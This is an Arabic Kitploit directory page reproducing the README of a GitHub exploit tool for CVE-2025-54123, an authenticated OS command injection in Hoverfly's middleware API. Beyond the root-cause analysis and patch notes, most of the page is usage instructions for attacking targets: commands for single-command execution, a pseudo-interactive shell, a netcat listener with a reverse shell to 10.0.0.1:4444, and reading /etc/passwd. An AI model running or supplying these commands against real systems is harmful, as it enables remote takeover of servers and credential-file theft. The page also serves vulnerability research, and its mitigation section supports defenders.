Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit — استغلال تنفيذ الأوامر عن بعد (RCE) مصادق عليه لـ Hoverfly ≤ 1.11.3 (CVE-2025-54123) عبر حقن أوامر نظام التشغيل في واجهة برمجة التطبيقات الوسيطة. يدعم تنفيذ أمر واحد، غلاف شبه تفاعلي، وغلاف عكسي للاختبار الأمني المصرح به. | Kitploit
أدوات/GitHubGitHub/0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالقيادة والسيطرةالأوراق والأبحاثالتعلم والتعليمالفريق الأحمرتطوير الحمولات

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub0x00phantom-hat/hoverfly-1.11.3-rce-cve-2025-54123-exploit

Hoverfly-1.11.3-RCE-CVE-2025-54123-Exploit

استغلال تنفيذ الأوامر عن بعد (RCE) مصادق عليه لـ Hoverfly ≤ 1.11.3 (CVE-2025-54123) عبر حقن أوامر نظام التشغيل في واجهة برمجة التطبيقات الوسيطة. يدعم تنفيذ أمر واحد، غلاف شبه تفاعلي، وغلاف عكسي للاختبار الأمني المصرح به.

عرض المستودع
1منذ 2 أشهرلم تتم المراجعة بعد

CVE-2025-54123 — تنفيذ التعليمات البرمجية عن بُعد عبر واجهة برمجة تطبيقات الوسيطة في Hoverfly

RCE موثَّقة عبر حقن أوامر نظام التشغيل في Hoverfly ≤ 1.11.3

نظرة عامة على الثغرة

الخاصيةالقيمة
CVE IDCVE-2025-54123
نقطة CVSS9.8 — حرجة
متجه CVSSCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CWECWE-78 (حقن أوامر نظام التشغيل)، CWE-20 (التحقق غير السليم من الإدخال)
المنتجHoverfly — أداة محاكاة واجهات برمجة التطبيقات مفتوحة المصدر
المتأثرجميع الإصدارات حتى 1.11.3 شاملاً
أُصلح في1.12.0 (commit التصحيح)
إشعار أمنيGHSA-r4h8-hfp2-ggmf

التحليل الفني

إليك دراسة حالة متعمقة وتحليل فني من منظور الصندوق الأبيض والأسود https://medium.com/@phantom_hat/cve-2025-54123-hoverfly-1-11-3-command-injection-rce-case-study-patch-diffing-aacc092f7f3a

سطح الهجوم

يُعرّض Hoverfly واجهة برمجة تطبيقات إدارية RESTful (المنفذ الافتراضي 8888) لإدارة تكوينات المحاكاة. يقبل نقطة نهاية إدارة الوسيطة في /api/v2/hoverfly/middleware نصًا JSON يحتوي على حقلي binary و script يُعرِّفان عملية وسيطة خارجية.

السبب الجذري

تنبع الثغرة من مزيج من ثلاثة عيوب على مستوى الكود:

  1. التحقق غير الكافي من الإدخال — middleware.go:93-96: تقبل الدالة SetBinary() المعامل binary دون أي تحقق أو تنقية، مما يسمح للمهاجم بتحديد ملفات تنفيذية عشوائية (مثل bash).

  2. تنفيذ الأوامر غير الآمن — local_middleware.go:14-19: تُنفَّذ الوسيطة عبر exec.Command() مع تمرير قيم binary و script التي يتحكم فيها المهاجم مباشرة كوسيطات، مما يتيح حقن أوامر نظام التشغيل.

  3. التنفيذ الفوري أثناء الاختبار — hoverfly_service.go:173: عند تعيين الوسيطة عبر واجهة برمجة التطبيقات، يقوم Hoverfly فورًا باختبار الوسيطة عن طريق تنفيذها، مما يؤدي إلى تشغيل الأمر المُحقن في وقت التكوين وليس في وقت اعتراض الوكيل.

تدفق الهجوم

root@kitploit:~
المهاجم                              Hoverfly (≤ 1.11.3)
   │                                        │
   │─── POST /api/token-auth ──────────────>│  (1) المصادقة
   │<── { "token": "eyJ..." } ─────────────│
   │                                        │
   │─── PUT /api/v2/hoverfly/middleware ───>│  (2) حقن الحمولة
   │    { "binary": "bash",                 │
   │      "script": "<malicious cmd>" }     │
   │                                        │
   │    ┌──────────────────────────────────┐│
   │    │ exec.Command("bash", tmpScript)  ││  (3) تنفيذ فوري
   │    │ → يعمل أمر المهاجم كـ       │
   │    │   مستخدم عملية Hoverfly      ││
   │    └──────────────────────────────────┘│
   │                                        │
   │<── مخرجات الأمر في استجابة الخطأ ──│  (4) استخراج المخرجات
   │                                        │

استخدام الاستغلال

المتطلبات الأساسية

  • Python 3.8+
  • بيانات اعتماد صالحة لواجهة برمجة تطبيقات إدارة Hoverfly (الافتراضي: admin / كلمة مرور قابلة للتكوين)

التثبيت

root@kitploit:~
git clone https://github.com/<your-username>/CVE-2025-54123.git
cd CVE-2025-54123
pip install -r requirements.txt

أوضاع التشغيل

وضع التحقق فقط

تحقق من إمكانية الوصول إلى الهدف والمصادقة دون استغلال:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -C

تنفيذ أمر واحد

نفذ أمرًا واحدًا لنظام التشغيل على الهدف:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'id'

شل تفاعلية وهمية

ادخل إلى جلسة شل مستمرة:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -i

شل عكسية

أرسل شل عكسية إلى المستمع الخاص بك:

root@kitploit:~
# الطرفية 1 — بدء المستمع
nc -lvnp 4444

# الطرفية 2 — تشغيل الاستغلال
python3 exploit.py -u http://target:8888 -U admin -P <password> --revshell 10.0.0.1:4444

الوضع المفصل مع وكيل

وجِّه حركة المرور عبر Burp Suite للفحص:

root@kitploit:~
python3 exploit.py -u http://target:8888 -U admin -P <password> -c 'cat /etc/passwd' --proxy -v

مرجع كامل للخيارات


المعالجة

تفاصيل التصحيح

التصحيح في commit 17e60a9 يعطل واجهة برمجة تطبيقات تعيين الوسيطة افتراضيًا. التغييرات اللاحقة في التوثيق (commit a9d4da7) تجعل المستخدمين على دراية بالآثار الأمنية لكشف نقطة النهاية هذه.


المراجع

  • NVD — CVE-2025-54123
  • إشعار أمني من GitHub — GHSA-r4h8-hfp2-ggmf
  • الكود الضعيف — hoverfly_service.go#L173
  • الكود الضعيف — middleware.go#L93
  • الكود الضعيف — local_middleware.go#L13
  • commit التصحيح — 17e60a9

إخلاء مسؤولية

تم توفير هذه الأداة لأغراض اختبار الأمان المصرح به والبحث التعليمي فقط. الوصول غير المصرح به إلى أنظمة الكمبيوتر غير قانوني بموجب قانون الاحتيال وإساءة استخدام الكمبيوتر (CFAA) والقوانين المماثلة في جميع أنحاء العالم. لا يتحمل المؤلف أي مسؤولية عن سوء استخدام هذا البرنامج. احصل دائمًا على إذن كتابي صريح قبل اختبار أي نظام لا تملكه.


هيكل المشروع

root@kitploit:~
CVE-2025-54123/
├── Exploit/
│   ├── exploit.py          # استغلال مُحسَّن
│   └── raw_exploit.py      # إثبات المفهوم الخام الأصلي
├── Images/                 # لقطات شاشة البحث
├── Reference/              # استغلالات مرجعية للدراسة
├── requirements.txt        # تبعيات بايثون
└── README.md               # هذا الملف

المؤلف

Phantom Hat — باحث أمني


تم إجراء هذا البحث كجزء من دراسة حالة ثغرة أمنية للأغراض التعليمية.

تنزيل الأداة
الخيارالوصفالافتراضي
-u, --urlرابط هدف Hoverflyمطلوب
-U, --usernameاسم المستخدم المسؤولمطلوب
-P, --passwordكلمة مرور المسؤولمطلوب
-c, --commandأمر نظام تشغيل لتنفيذه—
-C, --checkوضع التحقق فقط (بدون استغلال)false
-i, --interactiveشل تفاعلية وهميةfalse
--revshellشل عكسية LHOST:LPORT—
--proxyالتوجيه عبر 127.0.0.1:8080false
--timeoutمهلة الطلب (بالثواني)15
-v, --verboseتمكين المخرجات المفصلةfalse
الإجراءالتفاصيل
الترقيةقم بتحديث Hoverfly إلى الإصدار v1.12.0 أو أحدث، حيث يتم تعطيل واجهة برمجة تطبيقات تعيين الوسيطة افتراضيًا
تقسيم الشبكةاقتصر الوصول إلى واجهة برمجة تطبيقات إدارة Hoverfly (المنفذ 8888) على الشبكات الموثوقة فقط
المصادقةاستخدم كلمات مرور قوية وفريدة لواجهة برمجة تطبيقات إدارة Hoverfly
المراقبةراقب طلبات PUT غير المتوقعة إلى /api/v2/hoverfly/middleware